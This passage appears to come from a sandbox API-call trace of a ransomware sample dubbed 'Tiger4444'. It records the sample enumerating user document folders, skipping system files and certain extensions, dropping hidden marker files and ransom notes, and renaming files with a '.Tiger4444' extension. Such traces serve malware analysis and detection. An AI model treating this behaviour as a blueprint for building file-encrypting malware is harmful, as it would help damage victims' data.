lpString2="Tiger4444.exe") returned -1 [0046.786] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0046.786] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0046.787] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0046.787] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0046.787] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0046.787] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0046.787] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0046.787] lstrcmpiW (lpString1="desktop.ini", lpString2="NTUSER.DAT") returned -1 [0046.787] lstrcpyW (in: lpString1=0x30aeaf0, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0046.787] lstrlenW (lpString="desktop.ini") returned 11 [0046.787] lstrlenW (lpString="Tiger4444") returned 9 [0046.787] lstrcmpiW (lpString1="sktop.ini", lpString2="Tiger4444") returned -1 [0046.787] lstrlenW (lpString=".dll") returned 4 [0046.787] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0046.787] lstrlenW (lpString=".lnk") returned 4 [0046.787] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0046.787] lstrlenW (lpString=".ini") returned 4 [0046.787] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0046.787] FindNextFileW (in: hFindFile=0xc73148, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1a0f60e, ftCreationTime.dwHighDateTime=0x1d47c35, ftLastAccessTime.dwLowDateTime=0xc1a0f60e, ftLastAccessTime.dwHighDateTime=0x1d47c35, ftLastWriteTime.dwLowDateTime=0xc1a0f60e, ftLastWriteTime.dwHighDateTime=0x1d47c35, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites.vssx", cAlternateFileName="FAVORI~1.VSS")) returned 1 [0046.787] lstrcmpiW (lpString1="Favorites.vssx", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.787] lstrcmpiW (lpString1="Favorites.vssx", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.787] lstrcmpiW (lpString1="Favorites.vssx", lpString2="Tiger4444.exe") returned -1 [0046.787] lstrcmpiW (lpString1="Favorites.vssx", lpString2=".") returned 1 [0046.787] lstrcmpiW (lpString1="Favorites.vssx", lpString2="..") returned 1 [0046.787] lstrcmpiW (lpString1="Favorites.vssx", lpString2="windows") returned -1 [0046.787] lstrcmpiW (lpString1="Favorites.vssx", lpString2="bootmgr") returned 1 [0046.787] lstrcmpiW (lpString1="Favorites.vssx", lpString2="pagefile.sys") returned -1 [0046.787] lstrcmpiW (lpString1="Favorites.vssx", lpString2="boot") returned 1 [0046.787] lstrcmpiW (lpString1="Favorites.vssx", lpString2="ids.txt") returned -1 [0046.787] lstrcmpiW (lpString1="Favorites.vssx", lpString2="NTUSER.DAT") returned -1 [0046.787] lstrcpyW (in: lpString1=0x30aeaf0, lpString2="Favorites.vssx" | out: lpString1="Favorites.vssx") returned="Favorites.vssx" [0046.787] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\Favorites.vssx", dwFileAttributes=0x0) returned 1 [0046.787] lstrlenW (lpString="Favorites.vssx") returned 14 [0046.787] lstrlenW (lpString="Tiger4444") returned 9 [0046.787] lstrcmpiW (lpString1="ites.vssx", lpString2="Tiger4444") returned -1 [0046.788] lstrlenW (lpString=".dll") returned 4 [0046.788] lstrcmpiW (lpString1="vssx", lpString2=".dll") returned 1 [0046.788] lstrlenW (lpString=".lnk") returned 4 [0046.788] lstrcmpiW (lpString1="vssx", lpString2=".lnk") returned 1 [0046.788] lstrlenW (lpString=".ini") returned 4 [0046.788] lstrcmpiW (lpString1="vssx", lpString2=".ini") returned 1 [0046.788] lstrlenW (lpString=".sys") returned 4 [0046.788] lstrcmpiW (lpString1="vssx", lpString2=".sys") returned 1 [0046.788] FindNextFileW (in: hFindFile=0xc73148, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xc1bc4716, ftCreationTime.dwHighDateTime=0x1d47c35, ftLastAccessTime.dwLowDateTime=0xd44481c9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc1bc4716, ftLastWriteTime.dwHighDateTime=0x1d47c35, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 1 [0046.788] lstrcmpiW (lpString1="_private", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.788] lstrcmpiW (lpString1="_private", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.788] lstrcmpiW (lpString1="_private", lpString2="Tiger4444.exe") returned -1 [0046.788] lstrcmpiW (lpString1="_private", lpString2=".") returned 1 [0046.788] lstrcmpiW (lpString1="_private", lpString2="..") returned 1 [0046.788] lstrcmpiW (lpString1="_private", lpString2="windows") returned -1 [0046.788] lstrcmpiW (lpString1="_private", lpString2="bootmgr") returned -1 [0046.788] lstrcmpiW (lpString1="_private", lpString2="pagefile.sys") returned -1 [0046.788] lstrcmpiW (lpString1="_private", lpString2="boot") returned -1 [0046.788] lstrcmpiW (lpString1="_private", lpString2="ids.txt") returned -1 [0046.788] lstrcmpiW (lpString1="_private", lpString2="NTUSER.DAT") returned -1 [0046.788] lstrcpyW (in: lpString1=0x30aeaf0, lpString2="_private" | out: lpString1="_private") returned="_private" [0046.788] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66340 [0046.788] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x5a) returned 0xc5e610 [0046.788] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66348 | out: ListHead=0xc66828, ListEntry=0xc66348) returned 0xc66448 [0046.788] FindNextFileW (in: hFindFile=0xc73148, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xc1bc4716, ftCreationTime.dwHighDateTime=0x1d47c35, ftLastAccessTime.dwLowDateTime=0xd44481c9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc1bc4716, ftLastWriteTime.dwHighDateTime=0x1d47c35, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 0 [0046.788] FindClose (in: hFindFile=0xc73148 | out: hFindFile=0xc73148) returned 1 [0046.788] lstrcpyW (in: lpString1=0x30aeaf0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0046.788] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\documents\\my shapes\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0046.789] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0046.789] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0046.789] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0046.789] CloseHandle (hObject=0x260) returned 1 [0046.789] CloseHandle (hObject=0x2ac) returned 1 [0046.789] GetCurrentThreadId () returned 0xfa8 [0046.789] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66348 [0046.789] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private") returned="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private" [0046.789] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc5e610 | out: hHeap=0xc50000) returned 1 [0046.789] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66340 | out: hHeap=0xc50000) returned 1 [0046.789] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private") returned="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private" [0046.789] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private\\") returned="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private\\" [0046.789] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private\\.BFC0E91B00AE8A0620D3" [0046.789] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\documents\\my shapes\\_private\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0046.791] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0046.795] FlushFileBuffers (hFile=0x2ac) returned 1 [0046.801] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0046.801] CloseHandle (hObject=0x2ac) returned 1 [0046.801] lstrlenW (lpString="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private") returned 44 [0046.801] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0046.801] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xc1bc4716, ftCreationTime.dwHighDateTime=0x1d47c35, ftLastAccessTime.dwLowDateTime=0xd44481c9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x80e78893, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72d48 [0046.801] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.801] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0046.801] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0046.801] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0046.802] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xc1bc4716, ftCreationTime.dwHighDateTime=0x1d47c35, ftLastAccessTime.dwLowDateTime=0xd44481c9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x80e78893, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.802] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.802] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0046.802] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0046.802] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0046.802] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0046.802] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x80e78893, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x80e78893, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x80e9eb5e, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0046.802] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.802] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0046.802] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xc1bc4716, ftCreationTime.dwHighDateTime=0x1d47c35, ftLastAccessTime.dwLowDateTime=0xc1bc4716, ftLastAccessTime.dwHighDateTime=0x1d47c35, ftLastWriteTime.dwLowDateTime=0xc1bea8c6, ftLastWriteTime.dwHighDateTime=0x1d47c35, nFileSizeHigh=0x0, nFileSizeLow=0x74e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="folder.ico", cAlternateFileName="")) returned 1 [0046.802] lstrcmpiW (lpString1="folder.ico", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.802] lstrcmpiW (lpString1="folder.ico", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.802] lstrcmpiW (lpString1="folder.ico", lpString2="Tiger4444.exe") returned -1 [0046.802] lstrcmpiW (lpString1="folder.ico", lpString2=".") returned 1 [0046.802] lstrcmpiW (lpString1="folder.ico", lpString2="..") returned 1 [0046.802] lstrcmpiW (lpString1="folder.ico", lpString2="windows") returned -1 [0046.802] lstrcmpiW (lpString1="folder.ico", lpString2="bootmgr") returned 1 [0046.802] lstrcmpiW (lpString1="folder.ico", lpString2="pagefile.sys") returned -1 [0046.802] lstrcmpiW (lpString1="folder.ico", lpString2="boot") returned 1 [0046.802] lstrcmpiW (lpString1="folder.ico", lpString2="ids.txt") returned -1 [0046.802] lstrcmpiW (lpString1="folder.ico", lpString2="NTUSER.DAT") returned -1 [0046.802] lstrcpyW (in: lpString1=0x30aeb02, lpString2="folder.ico" | out: lpString1="folder.ico") returned="folder.ico" [0046.802] lstrlenW (lpString="folder.ico") returned 10 [0046.802] lstrlenW (lpString="Tiger4444") returned 9 [0046.802] lstrcmpiW (lpString1="older.ico", lpString2="Tiger4444") returned -1 [0046.802] lstrlenW (lpString=".dll") returned 4 [0046.802] lstrcmpiW (lpString1=".ico", lpString2=".dll") returned 1 [0046.802] lstrlenW (lpString=".lnk") returned 4 [0046.802] lstrcmpiW (lpString1=".ico", lpString2=".lnk") returned -1 [0046.802] lstrlenW (lpString=".ini") returned 4 [0046.802] lstrcmpiW (lpString1=".ico", lpString2=".ini") returned -1 [0046.802] lstrlenW (lpString=".sys") returned 4 [0046.802] lstrcmpiW (lpString1=".ico", lpString2=".sys") returned -1 [0046.802] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private\\folder.ico" (normalized: "c:\\users\\fd1hvy\\documents\\my shapes\\_private\\folder.ico"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0046.803] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0046.803] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13825567538) returned 1 [0046.803] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=29926) returned 1 [0046.803] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89608 [0046.803] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc720c0 [0046.803] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x77f0, lpName=0x0) returned 0x2c8 [0046.804] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x77f0) returned 0xbe0000 [0046.824] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0046.824] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75fe0 [0046.824] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0046.824] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc760f8 [0046.824] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0046.824] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc760f8 | out: hHeap=0xc50000) returned 1 [0046.824] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0046.824] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75fe0 | out: hHeap=0xc50000) returned 1 [0046.824] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13827748758) returned 1 [0046.824] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89608 | out: hHeap=0xc50000) returned 1 [0046.824] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc720c0 | out: hHeap=0xc50000) returned 1 [0046.825] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0046.825] CloseHandle (hObject=0x2c8) returned 1 [0046.825] CloseHandle (hObject=0x260) returned 1 [0046.825] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private\\folder.ico.Tiger4444") returned 65 [0046.825] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private\\folder.ico" (normalized: "c:\\users\\fd1hvy\\documents\\my shapes\\_private\\folder.ico"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private\\folder.ico.Tiger4444" (normalized: "c:\\users\\fd1hvy\\documents\\my shapes\\_private\\folder.ico.tiger4444"), dwFlags=0x1) returned 1 [0046.826] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=29936 | out: Addend=0xc6f980) returned 21974304 [0046.826] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=21 | out: Addend=0xc6f98c) returned 4821 [0046.826] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xc1bc4716, ftCreationTime.dwHighDateTime=0x1d47c35, ftLastAccessTime.dwLowDateTime=0xc1bc4716, ftLastAccessTime.dwHighDateTime=0x1d47c35, ftLastWriteTime.dwLowDateTime=0xc1bea8c6, ftLastWriteTime.dwHighDateTime=0x1d47c35, nFileSizeHigh=0x0, nFileSizeLow=0x74e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="folder.ico", cAlternateFileName="")) returned 0 [0046.826] FindClose (in: hFindFile=0xc72d48 | out: hFindFile=0xc72d48) returned 1 [0046.826] lstrcpyW (in: lpString1=0x30aeb02, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0046.826] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\documents\\my shapes\\_private\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0046.914] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0046.914] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0046.915] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0046.915] CloseHandle (hObject=0x260) returned 1 [0046.915] CloseHandle (hObject=0x2ac) returned 1 [0046.915] GetCurrentThreadId () returned 0xfa8 [0046.915] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66448 [0046.915] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6") returned="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6" [0046.915] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc60fe8 | out: hHeap=0xc50000) returned 1 [0046.915] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66440 | out: hHeap=0xc50000) returned 1 [0046.915] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6") returned="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6" [0046.915] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\") returned="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\" [0046.915] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\.BFC0E91B00AE8A0620D3" [0046.915] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0046.916] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0046.921] FlushFileBuffers (hFile=0x2ac) returned 1 [0047.085] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0047.086] CloseHandle (hObject=0x2ac) returned 1 [0047.086] lstrlenW (lpString="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6") returned 42 [0047.087] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0047.087] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x896cb80, ftCreationTime.dwHighDateTime=0x1d4cdb2, ftLastAccessTime.dwLowDateTime=0xb06efb20, ftLastAccessTime.dwHighDateTime=0x1d4ceb6, ftLastWriteTime.dwLowDateTime=0x80fa9d6b, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72e88 [0047.087] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.087] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0047.087] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0047.087] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0047.087] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x896cb80, ftCreationTime.dwHighDateTime=0x1d4cdb2, ftLastAccessTime.dwLowDateTime=0xb06efb20, ftLastAccessTime.dwHighDateTime=0x1d4ceb6, ftLastWriteTime.dwLowDateTime=0x80fa9d6b, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.087] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.087] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0047.087] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0047.087] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0047.087] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0047.087] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb647000, ftCreationTime.dwHighDateTime=0x1d4cb2a, ftLastAccessTime.dwLowDateTime=0x8e738830, ftLastAccessTime.dwHighDateTime=0x1d4ce87, ftLastWriteTime.dwLowDateTime=0x8e738830, ftLastWriteTime.dwHighDateTime=0x1d4ce87, nFileSizeHigh=0x0, nFileSizeLow=0xd34d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-0K PhNNHHadw-4-e.ppt", cAlternateFileName="-0KPHN~1.PPT")) returned 1 [0047.087] lstrcmpiW (lpString1="-0K PhNNHHadw-4-e.ppt", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.087] lstrcmpiW (lpString1="-0K PhNNHHadw-4-e.ppt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.087] lstrcmpiW (lpString1="-0K PhNNHHadw-4-e.ppt", lpString2="Tiger4444.exe") returned -1 [0047.087] lstrcmpiW (lpString1="-0K PhNNHHadw-4-e.ppt", lpString2=".") returned 1 [0047.087] lstrcmpiW (lpString1="-0K PhNNHHadw-4-e.ppt", lpString2="..") returned 1 [0047.087] lstrcmpiW (lpString1="-0K PhNNHHadw-4-e.ppt", lpString2="windows") returned -1 [0047.087] lstrcmpiW (lpString1="-0K PhNNHHadw-4-e.ppt", lpString2="bootmgr") returned -1 [0047.087] lstrcmpiW (lpString1="-0K PhNNHHadw-4-e.ppt", lpString2="pagefile.sys") returned -1 [0047.087] lstrcmpiW (lpString1="-0K PhNNHHadw-4-e.ppt", lpString2="boot") returned -1 [0047.088] lstrcmpiW (lpString1="-0K PhNNHHadw-4-e.ppt", lpString2="ids.txt") returned -1 [0047.088] lstrcmpiW (lpString1="-0K PhNNHHadw-4-e.ppt", lpString2="NTUSER.DAT") returned -1 [0047.088] lstrcpyW (in: lpString1=0x30aeafe, lpString2="-0K PhNNHHadw-4-e.ppt" | out: lpString1="-0K PhNNHHadw-4-e.ppt") returned="-0K PhNNHHadw-4-e.ppt" [0047.088] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-0K PhNNHHadw-4-e.ppt", dwFileAttributes=0x0) returned 1 [0047.088] lstrlenW (lpString="-0K PhNNHHadw-4-e.ppt") returned 21 [0047.088] lstrlenW (lpString="Tiger4444") returned 9 [0047.088] lstrcmpiW (lpString1="w-4-e.ppt", lpString2="Tiger4444") returned 1 [0047.088] lstrlenW (lpString=".dll") returned 4 [0047.088] 